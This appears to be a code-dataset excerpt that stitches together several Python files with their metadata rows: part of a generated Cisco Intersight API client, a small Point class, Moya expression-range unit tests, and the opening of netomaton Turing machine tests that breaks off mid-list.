be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdManagedInfraList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_ucsd_managed_infra_list_with_http_info(
**kwargs) # noqa: E501
def get_iaas_ucsd_managed_infra_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdManagedInfra' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_managed_infra_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasUcsdManagedInfraList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_iaas_ucsd_managed_infra_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/UcsdManagedInfras',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasUcsdManagedInfraList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_iaas_ucsd_info(self, moid, iaas_ucsd_info,
**kwargs): # noqa: E501
"""Update a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_iaas_ucsd_info(moid, iaas_ucsd_info, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_iaas_ucsd_info_with_http_info(
moid, iaas_ucsd_info, **kwargs) # noqa: E501
def patch_iaas_ucsd_info_with_http_info(self, moid, iaas_ucsd_info,
**kwargs): # noqa: E501
"""Update a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_iaas_ucsd_info_with_http_info(moid, iaas_ucsd_info, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasUcsdInfo, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'iaas_ucsd_info'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method patch_iaas_ucsd_info" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `patch_iaas_ucsd_info`"
) # noqa: E501
# verify the required parameter 'iaas_ucsd_info' is set
if self.api_client.client_side_validation and (
'iaas_ucsd_info' not in local_var_params or # noqa: E501
local_var_params['iaas_ucsd_info'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `iaas_ucsd_info` when calling `patch_iaas_ucsd_info`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'iaas_ucsd_info' in local_var_params:
body_params = local_var_params['iaas_ucsd_info']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/UcsdInfos/{Moid}',
'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasUcsdInfo', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_iaas_ucsd_info(self, moid, iaas_ucsd_info,
**kwargs): # noqa: E501
"""Update a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_iaas_ucsd_info(moid, iaas_ucsd_info, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_iaas_ucsd_info_with_http_info(
moid, iaas_ucsd_info, **kwargs) # noqa: E501
def update_iaas_ucsd_info_with_http_info(self, moid, iaas_ucsd_info,
**kwargs): # noqa: E501
"""Update a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_iaas_ucsd_info_with_http_info(moid, iaas_ucsd_info, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasUcsdInfo, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'iaas_ucsd_info'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method update_iaas_ucsd_info" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `update_iaas_ucsd_info`"
) # noqa: E501
# verify the required parameter 'iaas_ucsd_info' is set
if self.api_client.client_side_validation and (
'iaas_ucsd_info' not in local_var_params or # noqa: E501
local_var_params['iaas_ucsd_info'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `iaas_ucsd_info` when calling `update_iaas_ucsd_info`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'iaas_ucsd_info' in local_var_params:
body_params = local_var_params['iaas_ucsd_info']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/UcsdInfos/{Moid}',
'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasUcsdInfo', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 63.592504
| 1,389
| 0.65277
| 16,372
| 132,336
| 5.110494
| 0.026325
| 0.03576
| 0.05756
| 0.015681
| 0.975654
| 0.975319
| 0.974937
| 0.974447
| 0.972762
| 0.971997
| 0
| 0.011153
| 0.283173
| 132,336
| 2,080
| 1,390
| 63.623077
| 0.870855
| 0.577976
| 0
| 0.8829
| 0
| 0
| 0.174017
| 0.056257
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02881
| false
| 0
| 0.004647
| 0
| 0.062268
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
be865b60b1a3ac8f90f876232e371d4f1d737748
| 144
|
py
|
Python
|
src/point.py
|
Felieton/GeneticAlgorithm
|
f881f8ee68e3d48b8ad3054dd18208f8ac04a3c8
|
[
"MIT"
] | 1
|
2021-03-16T19:47:16.000Z
|
2021-03-16T19:47:16.000Z
|
src/point.py
|
Felieton/GeneticAlgorithm
|
f881f8ee68e3d48b8ad3054dd18208f8ac04a3c8
|
[
"MIT"
] | null | null | null |
src/point.py
|
Felieton/GeneticAlgorithm
|
f881f8ee68e3d48b8ad3054dd18208f8ac04a3c8
|
[
"MIT"
] | null | null | null |
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return f'({self.x}, {self.y})'
| 18
| 38
| 0.486111
| 22
| 144
| 2.818182
| 0.454545
| 0.241935
| 0.193548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.347222
| 144
| 7
| 39
| 20.571429
| 0.659574
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
bea67e69ae54228897fd3b831ebbcd0022c27df1
| 5,481
|
py
|
Python
|
moya/tests/test_expressionrange.py
|
moyaproject/moya
|
78b91d87b4519f91dfdd2b40dab44e72f201a843
|
[
"MIT"
] | 129
|
2015-02-16T12:02:50.000Z
|
2021-11-06T00:20:01.000Z
|
moya/tests/test_expressionrange.py
|
liaohandel/moya
|
78b91d87b4519f91dfdd2b40dab44e72f201a843
|
[
"MIT"
] | 5
|
2015-02-19T15:56:41.000Z
|
2015-09-08T18:58:35.000Z
|
moya/tests/test_expressionrange.py
|
liaohandel/moya
|
78b91d87b4519f91dfdd2b40dab44e72f201a843
|
[
"MIT"
] | 14
|
2015-02-19T17:20:34.000Z
|
2022-03-28T01:38:09.000Z
|
import unittest
from moya.context import Context
from moya.context.expressionrange import *
class TestExpressionRange(unittest.TestCase):
def test_exclusive_integer(self):
c = Context()
r = ExclusiveIntegerRange(c, 2, 4)
self.assertEqual(list(r), [2, 3])
self.assertEqual(len(r), 2)
self.assert_(1 not in r)
self.assert_(2 in r)
self.assert_(3 in r)
self.assert_(4 not in r)
self.assertEqual(r + 5, [2, 3, 5])
self.assertEqual(5 + r, [5, 2, 3])
self.assertEqual(list(r.keys()), [0, 1])
self.assertEqual(list(r.values()), [2, 3])
self.assertEqual(r.items(), [(0, 2), (1, 3)])
self.assertEqual(r[0], 2)
self.assertEqual(r[1], 3)
r = ExclusiveIntegerRange(c, 4, 2)
self.assertEqual(len(r), 2)
self.assertEqual(list(r), [4, 3])
self.assert_(1 not in r)
self.assert_(2 not in r)
self.assert_(3 in r)
self.assert_(4 in r)
self.assert_(5 not in r)
self.assertEqual(r + 5, [4, 3, 5])
self.assertEqual(5 + r, [5, 4, 3])
self.assertEqual(list(r.keys()), [0, 1])
self.assertEqual(list(r.values()), [4, 3])
self.assertEqual(list(r.items()), [(0, 4), (1, 3)])
self.assertEqual(r[0], 4)
self.assertEqual(r[1], 3)
def test_inclusive_integer(self):
c = Context()
r = InclusiveIntegerRange(c, 2, 4)
self.assertEqual(list(r), [2, 3, 4])
self.assertEqual(len(r), 3)
self.assert_(1 not in r)
self.assert_(2 in r)
self.assert_(3 in r)
self.assert_(4 in r)
self.assert_(5 not in r)
self.assertEqual(r + 5, [2, 3, 4, 5])
self.assertEqual(5 + r, [5, 2, 3, 4])
self.assertEqual(list(r.keys()), [0, 1, 2])
self.assertEqual(list(r.values()), [2, 3, 4])
self.assertEqual(list(r.items()), [(0, 2), (1, 3), (2, 4)])
self.assertEqual(r[0], 2)
self.assertEqual(r[1], 3)
self.assertEqual(r[2], 4)
r = InclusiveIntegerRange(c, 4, 2)
self.assertEqual(list(r), [4, 3, 2])
self.assertEqual(len(r), 3)
self.assert_(1 not in r)
self.assert_(2 in r)
self.assert_(3 in r)
self.assert_(4 in r)
self.assert_(5 not in r)
self.assertEqual(r + 5, [4, 3, 2, 5])
self.assertEqual(5 + r, [5, 4, 3, 2])
self.assertEqual(list(r.keys()), [0, 1, 2])
self.assertEqual(list(r.values()), [4, 3, 2])
self.assertEqual(list(r.items()), [(0, 4), (1, 3), (2, 2)])
self.assertEqual(r[0], 4)
self.assertEqual(r[1], 3)
self.assertEqual(r[2], 2)
def test_exclusive_character(self):
c = Context()
r = ExclusiveCharacterRange(c, "b", "d")
self.assertEqual(list(r), ["b", "c"])
self.assertEqual(len(r), 2)
self.assert_("a" not in r)
self.assert_("b" in r)
self.assert_("c" in r)
self.assert_("d" not in r)
self.assertEqual(r + "e", ["b", "c", "e"])
self.assertEqual("e" + r, ["e", "b", "c"])
self.assertEqual(list(r.keys()), [0, 1])
self.assertEqual(list(r.values()), ["b", "c"])
self.assertEqual(list(r.items()), [(0, "b"), (1, "c")])
self.assertEqual(r[0], "b")
self.assertEqual(r[1], "c")
r = ExclusiveCharacterRange(c, "d", "b")
self.assertEqual(list(r), ["d", "c"])
self.assertEqual(len(r), 2)
self.assert_("a" not in r)
self.assert_("b" not in r)
self.assert_("c" in r)
self.assert_("d" in r)
self.assert_("e" not in r)
self.assertEqual(r + "e", ["d", "c", "e"])
self.assertEqual("e" + r, ["e", "d", "c"])
self.assertEqual(list(r.keys()), [0, 1])
self.assertEqual(list(r.values()), ["d", "c"])
self.assertEqual(list(r.items()), [(0, "d"), (1, "c")])
self.assertEqual(r[0], "d")
self.assertEqual(r[1], "c")
def test_inclusive_character(self):
c = Context()
r = InclusiveCharacterRange(c, "b", "d")
self.assertEqual(list(r), ["b", "c", "d"])
self.assertEqual(len(r), 3)
self.assert_("a" not in r)
self.assert_("b" in r)
self.assert_("c" in r)
self.assert_("d" in r)
self.assert_("e" not in r)
self.assertEqual(r + "e", ["b", "c", "d", "e"])
self.assertEqual("e" + r, ["e", "b", "c", "d"])
self.assertEqual(list(r.keys()), [0, 1, 2])
self.assertEqual(list(r.values()), ["b", "c", "d"])
self.assertEqual(list(r.items()), [(0, "b"), (1, "c"), (2, "d")])
self.assertEqual(r[0], "b")
self.assertEqual(r[1], "c")
self.assertEqual(r[2], "d")
r = InclusiveCharacterRange(c, "d", "b")
self.assertEqual(list(r), ["d", "c", "b"])
self.assertEqual(len(r), 3)
self.assert_("a" not in r)
self.assert_("b" in r)
self.assert_("c" in r)
self.assert_("d" in r)
self.assert_("e" not in r)
self.assertEqual(r + "e", ["d", "c", "b", "e"])
self.assertEqual("e" + r, ["e", "d", "c", "b"])
self.assertEqual(list(r.keys()), [0, 1, 2])
self.assertEqual(list(r.values()), ["d", "c", "b"])
self.assertEqual(list(r.items()), [(0, "d"), (1, "c"), (2, "b")])
self.assertEqual(r[0], "d")
self.assertEqual(r[1], "c")
self.assertEqual(r[2], "b")
| 38.0625
| 73
| 0.51195
| 803
| 5,481
| 3.437111
| 0.051059
| 0.413043
| 0.096377
| 0.224638
| 0.859058
| 0.821739
| 0.807971
| 0.768478
| 0.709058
| 0.548188
| 0
| 0.043269
| 0.278964
| 5,481
| 143
| 74
| 38.328671
| 0.655111
| 0
| 0
| 0.522388
| 0
| 0
| 0.018792
| 0
| 0
| 0
| 0
| 0
| 0.850746
| 1
| 0.029851
| false
| 0
| 0.022388
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bea731fba372e2c93f77efb4d6d72392e171460b
| 18,938
|
py
|
Python
|
tests/test_turing_machine.py
|
lantunes/netomaton
|
fef60a787d031c9c7b1eb4ff990f7c12145579ef
|
[
"Apache-2.0"
] | 35
|
2018-12-07T14:11:29.000Z
|
2022-03-17T23:47:21.000Z
|
tests/test_turing_machine.py
|
lantunes/netomaton
|
fef60a787d031c9c7b1eb4ff990f7c12145579ef
|
[
"Apache-2.0"
] | 2
|
2020-03-15T06:45:39.000Z
|
2020-04-15T23:50:13.000Z
|
tests/test_turing_machine.py
|
lantunes/netomaton
|
fef60a787d031c9c7b1eb4ff990f7c12145579ef
|
[
"Apache-2.0"
] | 6
|
2019-10-18T08:47:32.000Z
|
2022-03-02T10:17:12.000Z
|
import netomaton as ntm
from netomaton import TuringMachine, HeadCentricTuringMachine, TapeCentricTuringMachine
from .rule_test import *
class TestTuringMachine(RuleTest):
def test_turing_machine1(self):
HEAD = {"up": 1, "down": 2}
CELL = {"on": 1, "off": 0}
rule_table = {
HEAD['up']: {
CELL['on']: [HEAD['up'], CELL['off'], TuringMachine.RIGHT],
CELL['off']: [HEAD['down'], CELL['on'], TuringMachine.RIGHT]
},
HEAD['down']: {
CELL['on']: [HEAD['up'], CELL['on'], TuringMachine.LEFT],
CELL['off']: [HEAD['down'], CELL['on'], TuringMachine.LEFT]
}
}
tm = HeadCentricTuringMachine(tape=[0] * 21, rule_table=rule_table,
initial_head_state=HEAD['up'], initial_head_position=3, max_timesteps=61)
trajectory = ntm.evolve(initial_conditions=tm.initial_conditions, network=tm.network,
activity_rule=tm.activity_rule, input=tm.input_function)
tape_history, head_activities = tm.activities_for_plotting(trajectory)
expected_activities = [[(1, 3)], [(2, 4)], [(2, 3)], [(1, 2)], [(2, 3)], [(1, 2)], [(1, 3)], [(1, 4)],
[(1, 5)], [(2, 6)], [(2, 5)], [(1, 4)], [(2, 5)], [(1, 4)], [(1, 5)], [(1, 6)],
[(1, 7)], [(2, 8)], [(2, 7)], [(1, 6)], [(2, 7)], [(1, 6)], [(1, 7)], [(1, 8)],
[(1, 9)], [(2, 10)], [(2, 9)], [(1, 8)], [(2, 9)], [(1, 8)], [(1, 9)], [(1, 10)],
[(1, 11)], [(2, 12)], [(2, 11)], [(1, 10)], [(2, 11)], [(1, 10)], [(1, 11)], [(1, 12)],
[(1, 13)], [(2, 14)], [(2, 13)], [(1, 12)], [(2, 13)], [(1, 12)], [(1, 13)], [(1, 14)],
[(1, 15)], [(2, 16)], [(2, 15)], [(1, 14)], [(2, 15)], [(1, 14)], [(1, 15)], [(1, 16)],
[(1, 17)], [(2, 18)], [(2, 17)], [(1, 16)], [(2, 17)]]
activities = ntm.get_activities_over_time_as_list(trajectory)
np.testing.assert_equal(expected_activities, activities)
expected_tape_history = self._convert_to_list_of_lists("turing_machine1-tape.ca")
np.testing.assert_equal(expected_tape_history, tape_history)
expected_head_activities = self._convert_to_list_of_lists("turing_machine1-head.ca", strings=True)
np.testing.assert_equal(expected_head_activities, head_activities)
def test_turing_machine1b(self):
HEAD = {"q0": 0, "q1": 1, "q2": 2, "q3": 3, "q4": 4, "q5": 5, "q6": 6}
CELL = {" ": 0, "a": 1, "b": 2, "c": 3, "x": 4, "y": 5, "z": 6}
rule_table = {
HEAD['q0']: {
CELL['a']: [HEAD['q1'], CELL['x'], TuringMachine.RIGHT],
CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
CELL['y']: [HEAD['q4'], CELL['y'], TuringMachine.LEFT],
CELL['b']: [HEAD['q0'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q0'], CELL['c'], TuringMachine.STAY],
CELL['x']: [HEAD['q0'], CELL['x'], TuringMachine.STAY],
CELL['z']: [HEAD['q0'], CELL['z'], TuringMachine.STAY],
},
HEAD['q1']: {
CELL['b']: [HEAD['q2'], CELL['y'], TuringMachine.RIGHT],
CELL['y']: [HEAD['q1'], CELL['y'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q1'], CELL['a'], TuringMachine.RIGHT],
CELL['c']: [HEAD['q1'], CELL['c'], TuringMachine.STAY],
CELL['x']: [HEAD['q1'], CELL['x'], TuringMachine.STAY],
CELL['z']: [HEAD['q1'], CELL['z'], TuringMachine.STAY],
CELL[' ']: [HEAD['q1'], CELL[' '], TuringMachine.STAY],
},
HEAD['q2']: {
CELL['c']: [HEAD['q3'], CELL['z'], TuringMachine.LEFT],
CELL['z']: [HEAD['q2'], CELL['z'], TuringMachine.RIGHT],
CELL['b']: [HEAD['q2'], CELL['b'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q2'], CELL['a'], TuringMachine.STAY],
CELL['x']: [HEAD['q2'], CELL['x'], TuringMachine.STAY],
CELL['y']: [HEAD['q2'], CELL['y'], TuringMachine.STAY],
CELL[' ']: [HEAD['q2'], CELL[' '], TuringMachine.STAY],
},
HEAD['q3']: {
CELL['x']: [HEAD['q0'], CELL['x'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q3'], CELL['a'], TuringMachine.LEFT],
CELL['b']: [HEAD['q3'], CELL['b'], TuringMachine.LEFT],
CELL['z']: [HEAD['q3'], CELL['z'], TuringMachine.LEFT],
CELL['y']: [HEAD['q3'], CELL['y'], TuringMachine.LEFT],
CELL['c']: [HEAD['q3'], CELL['c'], TuringMachine.STAY],
CELL[' ']: [HEAD['q3'], CELL[' '], TuringMachine.STAY]
},
HEAD['q4']: {
CELL[' ']: [HEAD['q5'], CELL[' '], TuringMachine.RIGHT],
CELL['x']: [HEAD['q4'], CELL['x'], TuringMachine.LEFT],
CELL['a']: [HEAD['q4'], CELL['a'], TuringMachine.STAY],
CELL['b']: [HEAD['q4'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q4'], CELL['c'], TuringMachine.STAY],
CELL['y']: [HEAD['q4'], CELL['y'], TuringMachine.STAY],
CELL['z']: [HEAD['q4'], CELL['z'], TuringMachine.STAY]
},
HEAD['q5']: {
CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
CELL['x']: [HEAD['q5'], CELL['x'], TuringMachine.RIGHT],
CELL['y']: [HEAD['q5'], CELL['y'], TuringMachine.RIGHT],
CELL['z']: [HEAD['q5'], CELL['z'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q5'], CELL['a'], TuringMachine.STAY],
CELL['b']: [HEAD['q5'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q5'], CELL['c'], TuringMachine.STAY]
},
HEAD['q6']: {
CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
CELL['a']: [HEAD['q6'], CELL['a'], TuringMachine.STAY],
CELL['b']: [HEAD['q6'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q6'], CELL['c'], TuringMachine.STAY],
CELL['x']: [HEAD['q6'], CELL['x'], TuringMachine.STAY],
CELL['y']: [HEAD['q6'], CELL['y'], TuringMachine.STAY],
CELL['z']: [HEAD['q6'], CELL['z'], TuringMachine.STAY]
}
}
tape = " aabbcc "
tm = HeadCentricTuringMachine(tape=[CELL[t] for t in tape], rule_table=rule_table,
initial_head_state=HEAD['q0'], initial_head_position=2,
terminating_state=HEAD['q6'], max_timesteps=50)
trajectory = ntm.evolve(initial_conditions=tm.initial_conditions, network=tm.network,
activity_rule=tm.activity_rule, input=tm.input_function)
tape_history, head_activities = tm.activities_for_plotting(trajectory)
expected_activities = [[(0, 2)], [(1, 3)], [(1, 4)], [(2, 5)], [(2, 6)], [(3, 5)], [(3, 4)], [(3, 3)], [(3, 2)],
